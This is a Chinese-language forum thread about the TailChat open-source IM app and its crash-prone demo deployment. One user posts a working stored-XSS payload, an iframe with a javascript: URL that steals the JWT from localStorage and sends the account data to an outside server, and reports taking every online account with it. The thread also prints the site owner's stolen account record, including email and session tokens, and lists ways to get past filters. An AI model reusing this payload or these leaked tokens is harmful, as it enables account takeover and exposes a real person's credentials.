TailChat - 插件化易拓展的开源 IM 应用

日常 | General
1

https://nightly.paw.msgbyte.com/

>

</s>Tailchat<e> 是一款插件化易拓展的开源 IM 应用。可拓展架构赋予 </s>Tailchat<e> 无限可能性。


>
>

前端微内核架构 + 后端微服务架构 使得 </s>Tailchat<e> 能够驾驭任何定制化/私有化的场景


>
>

面向企业与私域用户打造,高度自由的群组管理与定制化的面板展示可以让私域主能够更好的展示自己的作品,管理用户,打造自己的品牌与圈子。

不过这个 MRG 部署的 TailChat 真的就是个演示环境,隔三岔五崩一次
厉害到刷屏能刷崩的那种:ac01:

然后还存在xss(为此有人用这个给站长号盗了)
2

>

@“[已注销]”#p170733 然后还存在xss

这安全性 真的是为企业和私域用户打造么。。。。不能公开到公网的叫做私域应用是吧

3

@“小鱼飘飘”#p170827 是啊,我当时就发了个这个,然后所有在线的用户账号都到手了


</s><i> </i>[md]&lt;iframe src="javascript:fetch('//tailchat-nightly.moonrailgun.com/api/user/resolveToken',{headers:{'content-type':'application/json'},body:JSON.stringify({token:JSON.parse(localStorage.jsonwebtoken).rawData}),method:'POST'}).then(d=&gt;d.json()).then(s=&gt;{t=s.data;if(t&amp;&amp;t.discriminator){fetch('https://【数据删除】/?'+t.discriminator,{'headers':{'content-type':'application/x-www-form-urlencoded; charset=UTF-8'},body:`${encodeURIComponent(JSON.stringify(t,null,2)+'\n\nx-token:\n'+JSON.parse(localStorage.jsonwebtoken).rawData)}`,method:'POST',mode:'no-cors'})}})" height="0" width="0"/&gt;[/md]<i> </i><e>

比如站长的

```
{
“_id”: “610d5b3e2600ab001b7d9d4e”,
“email”: “[email protected]”,
“nickname”: “moonrailgun”,
“discriminator”: “3388”,
“temporary”: false,
“avatar”: “{BACKEND}/static/files/610d5b3e2600ab001b7d9d4e/281ac1233d8a2ccbf3f4b951542096ba.jpg”,
“type”: “normalUser”,
“emailVerified”: true,
“banned”: false,
“extra”: {
“location”: “Shanghai”
},
“createdAt”: “2021-08-06T15:54:38.371Z”,
“token”: “eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJfaWQiOiI2MTBkNWIzZTI2MDBhYjAwMWI3ZDlkNGUiLCJuaWNrbmFtZSI6Im1vb25yYWlsZ3VuIiwiZW1haWwiOiJtb29ucmFpbGd1bkBnbWFpbC5jb20iLCJhdmF0YXIiOiJ7QkFDS0VORH0vc3RhdGljL2ZpbGVzLzYxMGQ1YjNlMjYwMGFiMDAxYjdkOWQ0ZS8yODFhYzEyMzNkOGEyY2NiZjNmNGI5NTE1NDIwOTZiYS5qcGciLCJpYXQiOjE3MzIzNzQ1ODksImV4cCI6MTczNDk2NjU4OX0.SsRMymnlLzxWTSuFkCBZFrV1u6GI9NHgkIaOn50rBoI”
}

x-token:
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJfaWQiOiI2MTBkNWIzZTI2MDBhYjAwMWI3ZDlkNGUiLCJuaWNrbmFtZSI6Im1vb25yYWlsZ3VuIiwiZW1haWwiOiJtb29ucmFpbGd1bkBnbWFpbC5jb20iLCJhdmF0YXIiOiJ7QkFDS0VORH0vc3RhdGljL2ZpbGVzLzYxMGQ1YjNlMjYwMGFiMDAxYjdkOWQ0ZS8yODFhYzEyMzNkOGEyY2NiZjNmNGI5NTE1NDIwOTZiYS5qcGciLCJpYXQiOjE3MzIzNzMxNDgsImV4cCI6MTczNDk2NTE0OH0.ZgSeVXKIA3_GWt2zSSBs685LdvWzsPXQnG3Wn3WB94g
```
4

@“小鱼飘飘”#p170827 然后他ban了src带 </s>javascript<e> 的……


</s><i> </i>[md]&lt;iframe src="javascr ipt:......" height="0" width="0"/&gt;[/md]<i> </i><e>

然后他把src设置为只能 http 协议……

``` [md]<iframe src="毒蘑菇..."/>[/md] ```

然后给在场人电脑……我也没幸免于难……

>

oh my pcccccccccccccccc

最后 iframe 被ban,然后……

</s><i> </i>[md]&lt;svg&gt;&lt;x&gt;&lt;script&gt;...&lt;/x&gt;[/md]<i> </i><e>

于是svg没了